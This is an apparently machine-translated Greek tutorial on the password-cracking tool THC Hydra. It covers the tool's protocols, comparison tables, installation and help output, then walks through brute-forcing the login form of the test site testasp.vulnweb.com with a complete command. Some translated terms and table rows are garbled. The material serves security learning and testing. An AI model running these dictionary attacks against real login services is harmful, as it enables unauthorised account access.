Ο κωδικός πρόσβασης ορίζεται τεχνικά ως μυστική συμβολοσειρά χαρακτήρων που χρησιμοποιείται για τον έλεγχο ταυτότητας ή την απόκτηση πρόσβασης σε πόρους. Πρέπει να φυλάσσεται μυστικά και να αποκρύπτεται από άλλους στους οποίους δεν επιτρέπεται η πρόσβαση σε αυτούς τους πόρους. Οι κωδικοί πρόσβασης χρησιμοποιούνται με τους υπολογιστές από τις πρώτες ημέρες υπολογισμού. Ένα από τα συστήματα κοινής χρήσης για πρώτη φορά, εισήχθη το 1961. Είχε μια εντολή σύνδεσης που ζητούσε κωδικό πρόσβασης χρήστη. Αφού πληκτρολογήσετε PASSWORD, το σύστημα απενεργοποιεί τον μηχανισμό εκτύπωσης, εάν είναι δυνατόν, έτσι ώστε ο χρήστης να μπορεί να πληκτρολογήσει τον κωδικό πρόσβασής του με ιδιωτικό απόρρητο.
Η ισχύς ενός κωδικού πρόσβασης είναι συνάρτηση του μήκους, της πολυπλοκότητας και του απρόβλεπτου. Μετρά την αποτελεσματικότητα στην αντίσταση στην εικασία ή το σπάσιμο. Οι αδύναμοι κωδικοί πρόσβασης, από την άλλη πλευρά, συντομεύουν τον χρόνο που απαιτείται για να μαντέψουμε και να αποκτήσουμε πρόσβαση σε προσωπικά/εταιρικά e-mail, ευαίσθητα δεδομένα, όπως οικονομικές πληροφορίες, επιχειρηματικές πληροφορίες, πιστωτικές κάρτες κ.λπ.
Υπάρχουν πολλοί τρόποι με τους οποίους ένας κωδικός πρόσβασης μπορεί να είναι αδύναμος που αντιστοιχεί στη δύναμη των διαφόρων σχημάτων επιθέσεων. Η πιο δημοφιλής αυτού του είδους η επίθεση διαπιστευτηρίων είναι η ωμή δύναμη. είναι μια μέθοδος δοκιμής και σφάλματος όπως η εικασία, η προσπάθεια αποκωδικοποίησης κρυπτογραφημένων δεδομένων, όπως ο κωδικός πρόσβασης ή η κρυπτογράφηση δεδομένων που χρησιμοποιούνται από το πρόγραμμα εφαρμογής ή το εργαλείο hacking.
Το Hydra είναι το πιο γρήγορο cracker σύνδεσης δικτύου που υποστηρίζει πολλά πρωτόκολλα επίθεσης. Είναι πολύ γρήγορο και ευέλικτο και είναι εύκολο να προστεθούν νέες ενότητες. Αυτό το εργαλείο επιτρέπει στους ερευνητές και τους συμβούλους ασφαλείας να δείξουν πόσο εύκολο θα ήταν να αποκτήσουν μη εξουσιοδοτημένη πρόσβαση σε ένα σύστημα από απόσταση. Το Hydra γράφτηκε από τον van Hauser και υποστηρίχθηκε επιπλέον από τον David Maciejak. Στην πιο πρόσφατη ενημέρωση, η ανάπτυξη hydra μεταφέρεται στο δημόσιο αποθετήριο github στη διεύθυνση: https://github.com/vanhauser-thc/thc-hydra.
Το Hydra δοκιμάστηκε για μεταγλώττιση σε Linux, Windows/Cygwin, Solaris 11, FreeBSD 8.1, OpenBSD, OSX, QNX/Blackberry και διατίθεται υπό GPLv3 με ειδική επέκταση άδειας OpenSSL.
Η THC Hydra υποστηρίζει αυτά τα πρωτόκολλα: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP (S) -FORM-GET, HTTP (S) -FORM-POST, HTTP (S) -GET, HTTP (S) -HEAD , HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB (NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 και v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC και XMPP.
ΣΥΓΚΡΙΣΗ HYDRA ΜΕ ΑΛΛΑ ΕΡΓΑΛΕΙΑ ΠΡΑΣΙΝΗΣ
Υπάρχουν επίσης πολλά εργαλεία κροτίδας σύνδεσης δίπλα στο hydra, ωστόσο κανένα δεν υποστηρίζει μια τεράστια λίστα πρωτοκόλλων και παράλληλη υποστήριξη κροτίδων σύνδεσης όπως κάνει η hydra. Οι παρακάτω πίνακες δείχνουν το αποτέλεσμα των χαρακτηριστικών, των υπηρεσιών και της σύγκρισης ταχύτητας έναντι του medusa και του ncrack.
Χαρακτηριστικά
| χαρακτηριστικό | Ύδρα | μέδουσα | Ncrack |
| Αδεια | AGPLv3 | GPLv2 | Όροι GPLv2 + Nmap |
| Υποστήριξη IPv6 | Ναί | Οχι | Οχι |
| Γραφικό περιβάλλον εργασίας χρήστη | Ναί | Ναί | Οχι |
| Διεθνοποιημένη υποστήριξη (RFC 4013) | Ναί | Οχι | Οχι |
| Υποστήριξη διακομιστή μεσολάβησης HTTP | Ναί | Ναί | Οχι |
| SOCKS υποστήριξη μεσολάβησης | Ναί | Οχι | Οχι |
| Υποστηριζόμενα πρωτόκολλα | 51 | 22 | 7 |
Υπηρεσίες
| Υπηρεσία | Λεπτομέριες | Ύδρα | μέδουσα | Ncrack |
| ADAM-6500 | Ναί | Οχι | Οχι | |
| AFP | Ναί | Ναί | Οχι | |
| Αστερίσκος | Ναί | Οχι | Οχι | |
| Κωδικός πρόσβασης Cisco | Ναί | Οχι | Οχι | |
| Ενεργοποίηση Cisco | Ναί | Οχι | Οχι | |
| CVS | Ναί | Ναί | Οχι | |
| Firebird | Ναί | Οχι | Οχι | |
| FTP | Ναί | Ναί | Ναί | |
| Υποστήριξη SSL | AUTH TLS & FTP μέσω SSL | AUTH TLS & FTP μέσω SSL | Οχι | |
| HTTP | Μέθοδος (ες) | ΠΗΡΑ, ΚΕΦΑΛΗ, ΑΝΑΡΤΗΣΗ | ΠΑΙΡΝΩ | ΠΑΙΡΝΩ |
| Βασική Auth | Ναί | Ναί | Ναί | |
| Έντυπο HTTP | Μέθοδος (ες) | ΛΗΗ, ΑΝΑΡΤΗΣΗ | ΛΗΗ, ΑΝΑΡΤΗΣΗ | Οχι |
| Υποστήριξη SSL | HTTPS | HTTPS | Οχι | |
| Διαμεσολαβητής HTTP | Βασική Auth | Ναί | Οχι | Οχι |
| DIGEST-MD5 Auth | Ναί | Οχι | Οχι | |
| NTLM Auth | Ναί | Οχι | Οχι | |
| Υποστήριξη SSL | HTTPS | Οχι | Οχι | |
| Απαρίθμηση URL HTTP PROXY | Ναί | Οχι | Οχι | |
| ICQ | v5 | Ναί 1 | Οχι | Οχι |
| IMAP | LOGIN υποστήριξη | Ναί | Ναί | Οχι |
| Υποστήριξη AOTH LOGIN | Ναί | Οχι | Οχι | |
| Υποστήριξη AUTH PLAIN | Ναί | Ναί | Οχι | |
| Υποστήριξη AUTH CRAM-MD5 | Ναί | Οχι | Οχι | |
| Υποστήριξη AUTH CRAM-SHA1 | Ναί | Οχι | Οχι | |
| Υποστήριξη AUTH CRAM-SHA256 | Ναί | Οχι | Οχι | |
| Υποστήριξη AUTH DIGEST-MD5 | Ναί | Οχι | Οχι | |
| Υποστήριξη NTLM AUTH | Ναί | Ναί | Οχι | |
| Υποστήριξη AUTH SCRAM-SHA1 | Ναί | Οχι | Οχι | |
| Υποστήριξη SSL | IMAPS & STARTTLS | IMAPS & STARTTLS | Οχι | |
| IRC | Γενικός κωδικός πρόσβασης διακομιστή | Ναί | Οχι | Οχι |
| Κωδικός πρόσβασης λειτουργίας OPER | Ναί | Οχι | Οχι | |
| LDAP | v2, Απλή υποστήριξη | Ναί | Οχι | Οχι |
| v3, Απλή υποστήριξη | Ναί | Οχι | Οχι | |
| v3, AUTH CRAM-MD5 υποστήριξη | Ναί | Οχι | Οχι | |
| Υποστήριξη AUTH DIGEST-MD5 | Ναί | |||
| Υποστήριξη NTLM AUTH | Ναί | Ναί | ||
| Υποστήριξη AUTH SCRAM-SHA1 | Ναί | |||
| Υποστήριξη SSL | IMAPS & STARTTLS | IMAPS & STARTTLS | ||
| IRC | Γενικός κωδικός πρόσβασης διακομιστή | Ναί | ||
| Κωδικός πρόσβασης λειτουργίας OPER | Ναί | |||
| LDAP | v2, Απλή υποστήριξη | Ναί | ||
| v3, Απλή υποστήριξη | Ναί | |||
| v3, AUTH CRAM-MD5 υποστήριξη | Ναί | |||
| v3, υποστήριξη AUTH DIGEST-MD5 | Ναί | |||
| MS-SQL | Ναί | Ναί | ||
| MySQL | v3.x | Ναί | Ναί | |
| v4.x | Ναί | Ναί | ||
| v5.x | Ναί | Ναί | ||
| NCP | Ναί | Ναί | ||
| NNTP | Υποστήριξη ΧΡΗΣΤΗ | Ναί | Ναί | |
| Υποστήριξη AOTH LOGIN | Ναί | |||
| Υποστήριξη AUTH PLAIN | Ναί | |||
| Υποστήριξη AUTH CRAM-MD5 | Ναί | |||
| Υποστήριξη AUTH DIGEST-MD5 | Ναί | |||
| Υποστήριξη NTLM AUTH | Ναί | |||
| Υποστήριξη SSL | STARTTLS & NNTP μέσω SSL | |||
| Μαντείο | Βάση δεδομένων | Ναί | Ναί | |
| TNS Listener | Ναί | |||
| Αριθμός SID | Ναί | |||
| PC-NFS | Ναί | |||
| pcΑπουδήποτε | Εγγενής έλεγχος ταυτότητας | Ναί | Ναί | |
| Έλεγχος ταυτότητας με βάση το λειτουργικό σύστημα (MS) | Ναί | |||
| POP3 | Υποστήριξη ΧΡΗΣΤΗ | Ναί | Ναί | Ναί |
| Υποστήριξη APOP | Ναί | |||
| Υποστήριξη AOTH LOGIN | Ναί | Ναί | ||
| Υποστήριξη AUTH PLAIN | Ναί | Ναί | ||
| Υποστήριξη AUTH CRAM-MD5 | Ναί | |||
| Υποστήριξη AUTH CRAM-SHA1 | Ναί | |||
| Υποστήριξη AUTH CRAM-SHA256 | Ναί | |||
| Υποστήριξη AUTH DIGEST-MD5 | Ναί | |||
| Υποστήριξη NTLM AUTH | Ναί | Ναί | ||
| Υποστήριξη SSL | POP3S & STARTTLS | POP3S & STARTTLS | POP3S | |
| PostgreSQL | Ναί | Ναί | ||
| Αστερίσκος | Ναί | |||
| RDP | Σταθμός εργασίας Windows | Ναί | Ναί | Ναί |
| Windows Server | Ναί | Ναί | ||
| Συντάκτης τομέα | Ναί | Ναί | ||
| REDIS | Ναί | Οχι | ||
| REXEC | Ναί | Ναί | ||
| ΣΥΝΔΕΣΗ | Ναί | Ναί | ||
| RPCAP | Ναί | Οχι | ||
| RSH | Ναί | Ναί | ||
| RTSP | Ναί | Οχι | ||
| SAP R / 3 | Ναί | |||
| Siemens S7-300 | Ναί | |||
| ΓΟΥΛΙΑ | Ναί | |||
| Υποστήριξη SSL | SIP μέσω SSL | |||
| SMB | Λειτουργία NetBIOS | Ναί | Ναί | Οχι |
| Εγγενής λειτουργία W2K | Ναί | Ναί | Ναί | |
| Λειτουργία Hash | Ναί | Ναί | Οχι | |
| Διαγραφή κειμένου Auth | Ναί | Ναί | ||
| LMv1 Auth | Ναί | Ναί | Ναί | |
| LMv2 Auth | Ναί | Ναί | Ναί | |
| NTLMv1 Συντάκτης | Ναί | Ναί | Ναί | |
| NTLMv2 Auth | Ναί | Ναί | Ναί | |
| SMTP | Υποστήριξη AOTH LOGIN | Ναί | Ναί | |
| Υποστήριξη AUTH PLAIN | Ναί | Ναί | ||
| Υποστήριξη AUTH CRAM-MD5 | Ναί | |||
| Υποστήριξη AUTH DIGEST-MD5 | Ναί | |||
| Υποστήριξη NTLM AUTH | Ναί | Ναί | ||
| Υποστήριξη SSL | SMTPS & STARTTLS | SMTPS & STARTTLS | ||
| SMTP User Enum | VRFY cmd | Ναί | Ναί | |
| EXPN cmd | Ναί | Ναί | ||
| RCPT TO cmd | Ναί | Ναί | ||
| SNMP | v1 | Ναί | Ναί | |
| v2c | Ναί | Ναί | ||
| v3 | (Μόνο για το συντάκτη MD5/SHA1) | |||
| ΚΑΛΤΣΕΣ | v5, Κωδικός πρόσβασης Auth | Ναί | ||
| SSH | v1 | Ναί | ||
| v2 | Ναί | Ναί | Ναί | |
| Κλειδιά SSH | v1, v2 | Ναί | ||
| Ανατροπή (SVN) | Ναί | Ναί | ||
| Ομαδική ομιλία | TS2 | Ναί | ||
| Telnet | Ναί | Ναί | Ναί | |
| XMPP | Υποστήριξη AOTH LOGIN | Ναί | ||
| Υποστήριξη AUTH PLAIN | Ναί | |||
| Υποστήριξη AUTH CRAM-MD5 | Ναί | |||
| Υποστήριξη AUTH DIGEST-MD5 | Ναί | |||
| Υποστήριξη AUTH SCRAM-SHA1 | Ναί | |||
| VMware Auth Daemon | v1.00 / v1.10 | Ναί | Ναί | |
| Υποστήριξη SSL | Ναί | Ναί | ||
| VNC | Υποστήριξη κωδικού πρόσβασης RFB 3.x | Ναί | Ναί | |
| Υποστήριξη χρήστη RFB 3.x+κωδικός πρόσβασης | (Μόνο UltraVNC) | |||
| Υποστήριξη κωδικού πρόσβασης RFB 4.x | Ναί | Ναί | ||
| Υποστήριξη χρήστη RFB 4.x+κωδικός πρόσβασης | (Μόνο UltraVNC) |
Σύγκριση ταχύτητας
| Ταχύτητα (σε) | Ύδρα | μέδουσα | Ncrack |
| 1 Ενότητα Task / FTP | 11.93 | 12.97 | 18.01 |
| 4 Εργασίες / μονάδα FTP | 4.20 | 5.24 | 9.01 |
| 16 Εργασίες / μονάδα FTP | 2.44 | 2.71 | 12.01 |
| 1 Ενότητα Task / SSH v2 | 32,56 | 33,84 | 45.02 |
| 4 Εργασίες / ενότητα SSH v2 | 10.95 | Σπασμένος | Αναπάντητες |
| 16 Εργασίες / ενότητα SSH v2 | 5.14 | Σπασμένος | Αναπάντητες |
Αυτή ήταν μια σύντομη απλή εισαγωγή στην ύδρα. Τώρα ας προχωρήσουμε στην εγκατάσταση.
ΕΓΚΑΤΑΣΤΑΣΗ ΥΔΡΑ
Το Hydra είναι προεγκατεστημένο στο kali linux, ωστόσο αν έχετε διαφορετικό λειτουργικό σύστημα θα μπορούσατε να το μεταγλωττίσετε και να το εγκαταστήσετε στο σύστημά σας. Επί του παρόντος, η υποστήριξη της hydra σε διαφορετικές πλατφόρμες:
- Όλες οι πλατφόρμες UNIX (Linux, *bsd, Solaris, κ.λπ.)
- MacOS (βασικά κλώνος BSD)
- Windows με Cygwin (τόσο IPv4 όσο και IPv6)
- Κινητά συστήματα βασισμένα σε Linux, MacOS ή QNX (π.χ. Android, iPhone, Blackberry 10, Zaurus, iPaq)
Για λήψη, διαμόρφωση, μεταγλώττιση και εγκατάσταση του hydra, απλώς πληκτρολογήστε στο τερματικό:
git clone https://github.com/vanhauser-thc/thc-hydra.git cd thc-hydra ./configure make make install
Εάν έχετε Ubuntu/Debian θα χρειαστείτε κάποιες βιβλιοθήκες εξάρτησης:
apt install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird-dev libncp-dev
Εάν δεν μπορείτε να βρείτε αυτές τις βιβλιοθήκες στο αποθετήριο σας, τότε πρέπει να τις κατεβάσετε και να τις εγκαταστήσετε με μη αυτόματο τρόπο.
ΠΩΣ ΝΑ ΧΡΗΣΙΜΟΠΟΙΗΣΕΤΕ ΤΟ HYDRA
Συγχαρητήρια, τώρα καταφέρατε να εγκαταστήσετε το hydra στο σύστημά σας. Στην πραγματικότητα, το Hydra έρχεται με δύο γεύσεις, το GUI-gtk και την αγαπημένη μου, έκδοση CLI. και επιπλέον το hydra έχει επίσης έκδοση CLI με οδηγό, που ονομάζεται hydra-wizard. Θα καθοδηγηθείτε βήμα προς βήμα αντί να πληκτρολογήσετε όλες τις εντολές ή τα επιχειρήματα με μη αυτόματο τρόπο στο τερματικό. Για να τρέξετε την ύδρα, από τον τερματικό σας τύπο:
Για CLI:
hydra
Για CLI-wizard:
hydra-wizard
Για GUI:
xhydra
Αφού πληκτρολογήσετε ‘hydra’ θα εμφανίσει εντολές βοήθειας όπως αυτή:
[email protected] :~# hydra -h Hydra v8.6 (c)2017 by van Hauser/THC & David Maciejak - for legal purposes only Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]] Options: -R restore a previous aborted/crashed session -S perform an SSL connect -s PORT if the service is on a different default port, define it here -l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE -p PASS or -P FILE try password PASS, or load several passwords from FILE -x MIN:MAX:CHARSET password bruteforce generation, type '-x -h' to get help -e nsr try 'n' null password, 's' login as pass and/or 'r' reversed login -u loop around users, not passwords (effective! implied with -x) -C FILE colon separated 'login:pass' format, instead of -L/-P options -M FILE list of servers to be attacked in parallel, one entry per line -o FILE write found login/password pairs to FILE instead of stdout -f / -F exit when a login/pass pair is found (-M: -f per host, -F global) -t TASKS run TASKS number of connects in parallel (per host, default: 16) -w / -W TIME waittime for responses (32s) / between connects per thread -4 / -6 prefer IPv4 (default) or IPv6 addresses -v / -V / -d verbose mode / show login+pass for each attempt / debug mode -U service module usage details server the target server (use either this OR the -M option) service the service to crack (see below for supported protocols) OPT some service modules support additional input (-U for module help) Supported services: asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-head http[s]-post-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-crammd5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp Hydra is a tool to guess/crack valid login/password pairs - usage only allowed for legal purposes. This tool is licensed under AGPL v3.0. The newest version is always available at http://www.thc.org/thc-hydra These services were not compiled in: sapr3 oracle. Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup. E.g.: % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://) % export HYDRA_PROXY_HTTP=http://proxy:8080 % export HYDRA_PROXY_AUTH=user:pass Examples: hydra -l user -P passlist.txt ftp://192.168.0.1 hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5 hydra -l admin -p password ftp://[192.168.0.0/24]/ hydra -L logins.txt -P pws.txt -M targets.txt ssh
Bruteforce σύνδεση στο διαδίκτυο με την raδρα
Η Hydra υποστηρίζει κάποια υπηρεσία bruteforcing, όπως ανέφερα νωρίτερα, μία από αυτές χρησιμοποιείται για bruteforce συνδέσεις που βασίζονται στο διαδίκτυο, όπως, φόρμα σύνδεσης στα μέσα κοινωνικής δικτύωσης, φόρμα σύνδεσης τραπεζών χρηστών, σύνδεση μέσω διαδικτύου στο δρομολογητή σας, κλπ. Αυτή η μορφή http [s] που θα χειριστεί αυτό το αίτημα. Σε αυτό το σεμινάριο θα σας δείξω πώς να κάνετε bruteforce ευάλωτες συνδέσεις ιστού. Πριν πυροδοτήσουμε την ύδρα θα πρέπει να γνωρίζουμε ορισμένα επιχειρήματα όπως παρακάτω:
- Στόχος : http://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F
- Συνδεθείτε με το όνομα χρήστη : διαχειριστής (αν δεν είστε βέβαιοι, επιθεωρήστε αυτό)
- Λίστα κωδικών πρόσβασης : Η τοποθεσία της λίστας αρχείων λεξικού που περιέχει πιθανούς κωδικούς πρόσβασης.
- Παράμετροι φόρμας : γενικά, χρησιμοποιήστε δεδομένα παραποίησης ή διακομιστή μεσολάβησης για να λάβετε τη μορφή παραμέτρων αιτήματος. Αλλά εδώ χρησιμοποιώ τη γραμμή εργαλείων για προγραμματιστές δικτύου iceweasel, με βάση τον firefox.
- Ενότητα υπηρεσιών : http-post-form
Help for module http-post-form: ============================================================================ Module http-post-form requires the page and the parameters for the web form. By default this module is configured to follow a maximum of 5 redirections in a row. It always gathers a new cookie from the same URL without variables The parameters take three ':' separated values, plus optional values. (Note: if you need a colon in the option string as value, escape it with ':', but do not escape a '' with '\'.) Syntax: [url]:[form parameters]:[condition string][:(optional)[:(optional)] First is the page on the server to GET or POST to (URL). Second is the POST/GET variables (taken from either the browser, proxy, etc. with usernames and passwords being replaced in the '^USER^' and '^PASS^' placeholders (FORM PARAMETERS) Third is the string that it checks for an *invalid* login (by default) Invalid condition login check can be preceded by 'F=', successful condition login check must be preceded by 'S='. This is where most people get it wrong. You have to check the webapp what a failed string looks like and put it in this parameter! The following parameters are optional: C=/page/uri to define a different page to gather initial cookies from (h|H)=My-Hdr: foo to send a user defined HTTP header with each request ^USER^ and ^PASS^ can also be put into these headers! Note: 'h' will add the user-defined header at the end regardless it's already being sent by Hydra or not. 'H' will replace the value of that header if it exists, by the one supplied by the user, or add the header at the end Note that if you are going to put colons (:) in your headers you should escape them with a backslash (). All colons that are not option separators should be escaped (see the examples above and below). You can specify a header without escaping the colons, but that way you will not be able to put colons in the header value itself, as they will be interpreted by hydra as option separators.
Λήψη παραμέτρων δημοσίευσης χρησιμοποιώντας πρόγραμμα περιήγησης, iceweasel/firefox
Στο πρόγραμμα περιήγησής σας firefox πατήστε τα πλήκτρα « CTRL + SHIFT + Q ‘. Στη συνέχεια, ανοίξτε τη σελίδα σύνδεσης στον ιστόhttp://testasp.vulnweb.com/Login.asp?RetURL=%2FDefault%2Easp%3F, θα παρατηρήσετε ότι εμφανίζεται κάποιο κείμενο στην καρτέλα προγραμματιστή δικτύου. Σας λέει ποια αρχεία μας μεταφέρονται. Δείτε τη μέθοδο είναι όλα GET, αφού δεν έχουμε δημοσιεύσει ακόμη δεδομένα.
Για να λάβετε τις παραμέτρους μετά τη φόρμα, πληκτρολογήστε οτιδήποτε στη φόρμα ονόματος χρήστη ή κωδικού πρόσβασης. Θα παρατηρήσετε μια νέα μέθοδο POST στην καρτέλα προγραμματιστή δικτύου. Κάντε διπλό κλικ σε αυτήν τη γραμμή, στην καρτέλα Κεφαλίδες κάντε κλικ στο κουμπί Επεξεργασία και Επανάληψη αποστολής στη δεξιά πλευρά. Στο Σώμα Αιτήματος αντιγράψτε την τελευταία γραμμή, όπως π.χ. tfUName = asu & tfUPass = raimu Το ο tfUName και tfUPass είναι παράμετροι που χρειαζόμαστε. Όπως φαίνεται παρακάτω:
Το Kali linux έχει πολλές λίστες λέξεων, επιλέξτε την κατάλληλη λίστα λέξεων ή απλώς χρησιμοποιήστε τη θέση rockyou.txt στο /usr/share/wordlists/ όπως φαίνεται παρακάτω:
Εντάξει, τώρα έχουμε όλα τα επιχειρήματα που χρειαζόμαστε και είμαστε έτοιμοι να πυροδοτήσουμε την ύδρα. Εδώ είναι το μοτίβο εντολών:
hydra -l -P [/code] Finally, based on information we have gathered, our commands ahould look something like this: hydra -l admin -P /usr/share/wordlists/rockyou.txt testasp.vulnweb.com http-post-form '/Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout' -vV -f
Ας αναλύσουμε τις εντολές:
- ο : είναι μια λέξη που περιέχει λογαριασμό χρήστη, χρησιμοποιήστε το -L για να παραπέμψετε τη λίστα πιθανών ονομάτων χρήστη σε ένα αρχείο.
- Π : είναι μια λίστα αρχείων πιθανών κωδικών πρόσβασης, χρησιμοποιήστε το -p για να χρησιμοποιήσετε κυριολεκτικά έναν κωδικό πρόσβασης λέξης αντί να το μαντέψετε.
- testapp.vunlwebapp.com : είναι όνομα κεντρικού υπολογιστή ή στόχος
- http-post-form : είναι η ενότητα υπηρεσίας που χρησιμοποιούμε
- /Login.asp?RetURL=%2FDefault%2Easp%3F:tfUName=^USER^&tfUPass=^PASS^:S=logout = οι 3 παράμετροι που χρειάζονται, η σύνταξη είναι:
{σελίδα URL}: {Αίτημα παραμέτρων φόρμας σώματος δημοσίευσης}: S = {Βρείτε οτιδήποτε υπάρχει στη σελίδα μετά την επιτυχημένη σύνδεση} - v = Λεκτική λειτουργία
- V = εμφάνιση σύνδεσης: πάσο για κάθε προσπάθεια
- φά = Τερματισμός προγράμματος εάν συνδεθεί ζεύγος: βρέθηκε κωδικός πρόσβασης
Τώρα ας αφήσουμε την hydra να προσπαθήσει να σπάσει τον κωδικό πρόσβασης για εμάς, χρειάζεται χρόνος αφού πρόκειται για επίθεση στο λεξικό. Μόλις πετύχετε την εύρεση ενός ζευγαριού σύνδεσης: ο κωδικός hydra θα τερματίσει αμέσως την εργασία και θα εμφανίσει το έγκυρο διαπιστευτήριο.
Υπάρχουν τόσα πολλά που θα μπορούσε να κάνει η hydra, αφού σε αυτό το σεμινάριο μόλις μάθαμε πώς να bruteforce σύνδεση μέσω διαδικτύου χρησιμοποιώντας το hydra, μαθαίνουμε μόνο ένα πρωτόκολλο, δηλαδή το πρωτόκολλο http-post-form. Μπορούμε επίσης να χρησιμοποιήσουμε το hydra έναντι ενός άλλου πρωτοκόλλου όπως ssh, ftp, telnet, VNC, proxy, κλπ.